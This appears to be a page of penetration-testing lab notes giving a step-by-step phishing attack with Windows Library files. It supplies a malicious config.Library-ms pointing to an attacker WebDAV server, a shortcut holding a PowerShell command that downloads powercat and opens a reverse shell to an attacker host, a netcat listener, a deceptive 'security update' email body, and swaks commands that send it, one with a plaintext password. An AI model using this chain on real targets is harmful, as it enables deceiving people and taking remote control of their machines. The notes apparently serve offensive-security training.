Phishing for Access

There are two ways to carry out a phishing attack. One method involves using macros, while the other uses Windows library files. An attacker can gain access to the victim's system by employing these techniques. To execute a phishing attack using macros, the macros must be installed on the victim's machine via MS Word.

Using Windows Library files

For this attack, we have to set up a WebDAV server, a Python3 web server, a Netcat listener, and prepare the Windows Library and shortcut files.

A WebDAV server (Web Distributed Authoring and Versioning) is an extension of the HTTP protocol that allows users to remotely manage files on a server. It enables clients to upload, download, and modify files on a server using standard HTTP methods, often making it function similarly to a shared drive. WebDAV is used in applications where collaborative document editing, file sharing, or remote storage access is required.

1. Setting wsgidav server

Step 1:

Make a directory named as webdev. This will act as webDEV root directory.

mkdir webdev

Step 2:

Locate the wsgidav as we will be using it to sending mail.

# Example:
locate wsgidav | head -n 1 # If not found then install it.

# Start the server.
/usr/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/assembling_pieces/beyond/webdav/

2. Preparing Windows library file

We will create and name the Library file using Windows.

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://192.168.45.187</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

I will store the above code in a file named as config.Library-ms. (Change the IP address to your Kali Linux VPN IP.)

3. Creating a Shortcut for Reverse Shell Execution

In this guide, we'll create a shortcut file on the WINDOWS machine that, when double-clicked by a victim, downloads PowerCat and establishes a reverse shell.

Step 1: Locate and Serve PowerCat on Kali Linux

First, locate the powercat.ps1 script on Kali Linux, then start a Python web server in the directory where powercat.ps1 is stored.

Locate the file:
```
locate powercat.ps1
```

Start the server:

python3 -m http.server 8000 -d /usr/share/windows-resources/powercat/

Step 2: Create the Shortcut on Windows machine

Now, create a shortcut that runs PowerCat and starts a reverse shell.

Right-click on the Desktop and select New > Shortcut.

In the shortcut target, use the following PowerShell command (adjusting the IP and port as necessary) and name the file as install:

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.187:8000/powercat.ps1'); powercat -c 192.168.45.187 -p 443 -e powershell"

Step 3: Start Netcat Listener

Set up a Netcat listener on Kali to capture the incoming connection.

sudo rlwrap nc -lnkvp 443

4. Creating Body content for mail

Make relevent body content for sending in mail and save it with name as body.txt in webdev.

Example:

Hey!
I checked WEBSRV1 and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons.

On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within. Thanks!

John

In a real assessment we should also use passive information gathering techniques to obtain more information about a potential target. Based on this information, we could create more tailored emails and improve our chances of success tremendously.

5. Transferring file

Now, transfer the file you created to the WebDAV folder we set up earlier. You can use the /drive option with the xfreerdp tool for this transfer, or alternatively, you can use impacket-smbserver to accomplish the same task.

xfreerdp /v:192.168.178.250 /u:offsec /p:lab /cert-ignore /dynamic-resolution /drive:webdev,/home/kali/assembling_pieces/beyond/webdav/

Copy the files to this share. (To avoid making shortcut cut and paste)

6. Sending mail

We can use the command below to send mail. We need to modify it according to scenarios.

For safety purposes, I have placed all the required files in the WebDAV folder.

# Run this command from webDav Folder
sudo swaks -t [email protected] -t [email protected] --from [email protected] --attach @config.Library-ms --server 192.168.178.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap

# Other way:
# You can mention username and password in the command itself.
# Removed `-ap` flag from previous command and added two other flag
sudo swaks -t [email protected] --from [email protected] --attach @config.Library-ms --server 192.168.225.189 --body @body.txt --header "Subject: Immediate Action Required: Security Enhancements & Maintenance" --suppress-data --auth-user maildmz --auth-password DPuBT9tGCBrTbR

Note: Sometimes, an email ID must be used in --auth-user if the username does not work.

-t or --to

Purpose: Specifies the recipient(s) of the email.

--from

Purpose: Sets the sender's email address.

--attach

Purpose: Attaches a file to the email.
Description: The @ symbol before the filename indicates that the file config.Library-ms should be attached to the email.

--server

Purpose: Specifies the SMTP server to use for sending the email.
Description: Points Swaks to the SMTP server's IP address or hostname that will handle the email delivery.

--body

Purpose: Sets the body content of the email.
Description: The @ symbol before body.txt tells Swaks to read the email body from the file body.txt.

--header

Purpose: Adds custom headers to the email.
Description: Sets the email's subject line. You can add multiple headers by using this option multiple times.

--suppress-data

Purpose: Reduces the amount of output Swaks provides during the SMTP transaction.
Description: When enabled, Swaks will not display the full email content and attachments in the terminal, summarizing the SMTP interactions instead. This makes the output cleaner and focuses on the transaction steps rather than the data being sent.

-a or --auth with -p

Purpose: Enables authentication using a password.
Usage in Command: -ap
Description:
- -a typically stands for authentication method, and combined with -p, it enables password-based authentication.
- In some contexts, -a might require specifying the authentication mechanism (e.g., --auth LOGIN), but here it seems combined with -p to prompt for a password.
- When executing the command, Swaks will prompt you to enter the password for the sender's email account ([email protected]).

7. Check the Netcat listener.

Wait for some time and then check netcat listener for reverse shell.

PreviousOS Command Injection NextSQL injection

Last updated 11 months ago